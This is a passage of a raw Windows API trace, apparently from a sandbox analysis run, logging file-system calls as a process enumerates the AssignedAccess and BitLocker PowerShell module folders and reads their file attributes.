cFileName="", cAlternateFileName="")) returned 0 [0226.077] FindClose (in: hFindFile=0x1a5cf670 | out: hFindFile=0x1a5cf670) returned 1 [0226.077] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe460) returned 1 [0226.077] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe420) returned 1 [0226.077] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fe510) returned 1 [0226.078] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AssignedAccess", nBufferLength=0x105, lpBuffer=0x1b7fe000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AssignedAccess", lpFilePart=0x0) returned 0x41 [0226.078] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AssignedAccess\\", nBufferLength=0x105, lpBuffer=0x1b7fdfa0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AssignedAccess\\", lpFilePart=0x0) returned 0x42 [0226.078] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AssignedAccess\\*", lpFindFileData=0x1b7fe1b0 | out: lpFindFileData=0x1b7fe1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6f8bffde, ftCreationTime.dwHighDateTime=0x1d112f2, ftLastAccessTime.dwLowDateTime=0x6f8bffde, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8bffde, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a5cf670 [0226.078] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6f8bffde, ftCreationTime.dwHighDateTime=0x1d112f2, ftLastAccessTime.dwLowDateTime=0x6f8bffde, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8bffde, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0226.078] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x37eb452f, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x37eb452f, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x37eb452f, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x198, dwReserved0=0x0, dwReserved1=0x0, cFileName="AssignedAccess.psd1", cAlternateFileName="")) returned 1 [0226.078] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x37eb452f, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x692d2629, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x692f8869, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x1d69, dwReserved0=0x0, dwReserved1=0x0, cFileName="AssignedAccess.psm1", cAlternateFileName="")) returned 1 [0226.078] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6f8bffde, ftCreationTime.dwHighDateTime=0x1d112f2, ftLastAccessTime.dwLowDateTime=0x6f8bffde, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8bffde, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0226.079] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6f8bffde, ftCreationTime.dwHighDateTime=0x1d112f2, ftLastAccessTime.dwLowDateTime=0x6f8bffde, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8bffde, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 0 [0226.079] FindClose (in: hFindFile=0x1a5cf670 | out: hFindFile=0x1a5cf670) returned 1 [0226.079] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe460) returned 1 [0226.079] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe420) returned 1 [0226.079] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AssignedAccess", nBufferLength=0x105, lpBuffer=0x1b7fe100, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AssignedAccess", lpFilePart=0x0) returned 0x41 [0226.079] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fe540) returned 1 [0226.079] GetFileAttributesExW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AssignedAccess" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\assignedaccess"), fInfoLevelId=0x0, lpFileInformation=0x1b7fe620 | out: lpFileInformation=0x1b7fe620*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6f8bffde, ftCreationTime.dwHighDateTime=0x1d112f2, ftLastAccessTime.dwLowDateTime=0x6f8bffde, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8bffde, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0226.079] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe500) returned 1 [0226.079] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fe570) returned 1 [0226.079] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AssignedAccess", nBufferLength=0x105, lpBuffer=0x1b7fe060, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AssignedAccess", lpFilePart=0x0) returned 0x41 [0226.079] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AssignedAccess\\", nBufferLength=0x105, lpBuffer=0x1b7fe000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AssignedAccess\\", lpFilePart=0x0) returned 0x42 [0226.080] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AssignedAccess\\*", lpFindFileData=0x1b7fe210 | out: lpFindFileData=0x1b7fe210*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6f8bffde, ftCreationTime.dwHighDateTime=0x1d112f2, ftLastAccessTime.dwLowDateTime=0x6f8bffde, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8bffde, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a5cf670 [0226.080] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe260 | out: lpFindFileData=0x1b7fe260*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6f8bffde, ftCreationTime.dwHighDateTime=0x1d112f2, ftLastAccessTime.dwLowDateTime=0x6f8bffde, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8bffde, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0226.080] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe260 | out: lpFindFileData=0x1b7fe260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x37eb452f, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x37eb452f, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x37eb452f, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x198, dwReserved0=0x0, dwReserved1=0x0, cFileName="AssignedAccess.psd1", cAlternateFileName="")) returned 1 [0226.080] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe260 | out: lpFindFileData=0x1b7fe260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x37eb452f, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x692d2629, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x692f8869, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x1d69, dwReserved0=0x0, dwReserved1=0x0, cFileName="AssignedAccess.psm1", cAlternateFileName="")) returned 1 [0226.080] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe260 | out: lpFindFileData=0x1b7fe260*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6f8bffde, ftCreationTime.dwHighDateTime=0x1d112f2, ftLastAccessTime.dwLowDateTime=0x6f8bffde, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8bffde, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0226.081] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe260 | out: lpFindFileData=0x1b7fe260*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0226.081] FindClose (in: hFindFile=0x1a5cf670 | out: hFindFile=0x1a5cf670) returned 1 [0226.081] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe4c0) returned 1 [0226.081] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe480) returned 1 [0226.081] GetFileAttributesW (lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AssignedAccess\\AssignedAccess.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\assignedaccess\\assignedaccess.psd1")) returned 0x20 [0226.081] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fe510) returned 1 [0226.081] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\BitLocker", nBufferLength=0x105, lpBuffer=0x1b7fe000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\BitLocker", lpFilePart=0x0) returned 0x3c [0226.081] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\BitLocker\\", nBufferLength=0x105, lpBuffer=0x1b7fdfa0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\BitLocker\\", lpFilePart=0x0) returned 0x3d [0226.081] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\BitLocker\\*", lpFindFileData=0x1b7fe1b0 | out: lpFindFileData=0x1b7fe1b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a5cf670 [0226.082] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0226.082] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3537dbc4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x3537dbc4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x3537dbc4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x16ae, dwReserved0=0x0, dwReserved1=0x0, cFileName="BitLocker.Format.ps1xml", cAlternateFileName="")) returned 1 [0226.082] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3537dbc4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x3537dbc4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x3537dbc4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x644, dwReserved0=0x0, dwReserved1=0x0, cFileName="BitLocker.psd1", cAlternateFileName="")) returned 1 [0226.082] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3537dbc4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x3537dbc4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x3537dbc4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x48564, dwReserved0=0x0, dwReserved1=0x0, cFileName="BitLocker.psm1", cAlternateFileName="")) returned 1 [0226.083] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbe8d4b97, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0226.083] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3537dbc4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x3537dbc4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x3537dbc4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3000, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.BitLocker.Structures.dll", cAlternateFileName="")) returned 1 [0226.083] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3537dbc4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x3537dbc4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x3537dbc4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3000, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.BitLocker.Structures.dll", cAlternateFileName="")) returned 0 [0226.083] FindClose (in: hFindFile=0x1a5cf670 | out: hFindFile=0x1a5cf670) returned 1 [0226.083] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe460) returned 1 [0226.083] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe420) returned 1 [0226.083] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fe510) returned 1 [0226.083] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\BitLocker", nBufferLength=0x105, lpBuffer=0x1b7fe000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\BitLocker", lpFilePart=0x0) returned 0x3c [0226.083] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\BitLocker\\", nBufferLength=0x105, lpBuffer=0x1b7fdfa0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\BitLocker\\", lpFilePart=0x0) returned 0x3d [0226.083] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\BitLocker\\*", lpFindFileData=0x1b7fe1b0 | out: lpFindFileData=0x1b7fe1b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a5cf670 [0226.084] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0226.084] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3537dbc4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x3537dbc4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x3537dbc4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x16ae, dwReserved0=0x0, dwReserved1=0x0, cFileName="BitLocker.Format.ps1xml", cAlternateFileName="")) returned 1 [0226.085] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3537dbc4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x3537dbc4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x3537dbc4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x644, dwReserved0=0x0, dwReserved1=0x0, cFileName="BitLocker.psd1", cAlternateFileName="")) returned 1 [0226.087] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3537dbc4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x3537dbc4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x3537dbc4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x48564, dwReserved0=0x0, dwReserved1=0x0, cFileName="BitLocker.psm1", cAlternateFileName="")) returned 1 [0226.087] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbe8d4b97, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0226.087] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3537dbc4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x3537dbc4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x3537dbc4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3000, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.BitLocker.Structures.dll", cAlternateFileName="")) returned 1 [0226.087] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0226.087] FindClose (in: hFindFile=0x1a5cf670 | out: hFindFile=0x1a5cf670) returned 1 [0226.087] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe460) returned 1 [0226.087] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe420) returned 1 [0226.087] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\BitLocker", nBufferLength=0x105, lpBuffer=0x1b7fe100, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\BitLocker", lpFilePart=0x0) returned 0x3c [0226.088] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fe540) returned 1 [0226.088] GetFileAttributesExW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\BitLocker" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\bitlocker"), fInfoLevelId=0x0, lpFileInformation=0x1b7fe620 | out: lpFileInformation=0x1b7fe620*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0226.088] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe500) returned 1 [0226.088] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fe570) returned 1 [0226.088] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\BitLocker", nBufferLength=0x105, lpBuffer=0x1b7fe060, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\BitLocker", lpFilePart=0x0) returned 0x3c [0226.088] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\BitLocker\\", nBufferLength=0x105, lpBuffer=0x1b7fe000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\BitLocker\\", lpFilePart=0x0) returned 0x3d [0226.088] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\BitLocker\\*", lpFindFileData=0x1b7fe210 | out: lpFindFileData=0x1b7fe210*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a5cf670 [0226.088] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe260 | out: lpFindFileData=0x1b7fe260*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0226.088] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe260 | out: lpFindFileData=0x1b7fe260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3537dbc4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x3537dbc4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x3537dbc4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x16ae, dwReserved0=0x0, dwReserved1=0x0, cFileName="BitLocker.Format.ps1xml", cAlternateFileName="")) returned 1 [0226.089] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe260 | out: lpFindFileData=0x1b7fe260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3537dbc4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x3537dbc4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x3537dbc4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x644, dwReserved0=0x0, dwReserved1=0x0, cFileName="BitLocker.psd1", cAlternateFileName="")) returned 1 [0226.089] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe260 | out: lpFindFileData=0x1b7fe260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3537dbc4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x3537dbc4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x3537dbc4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x48564, dwReserved0=0x0, dwReserved1=0x0, cFileName="BitLocker.psm1", cAlternateFileName="")) returned 1 [0226.089] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe260 | out: lpFindFileData=0x1b7fe260*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbe8d4b97, ftCreationTime.dwHighDateTime=0x1d112f1, 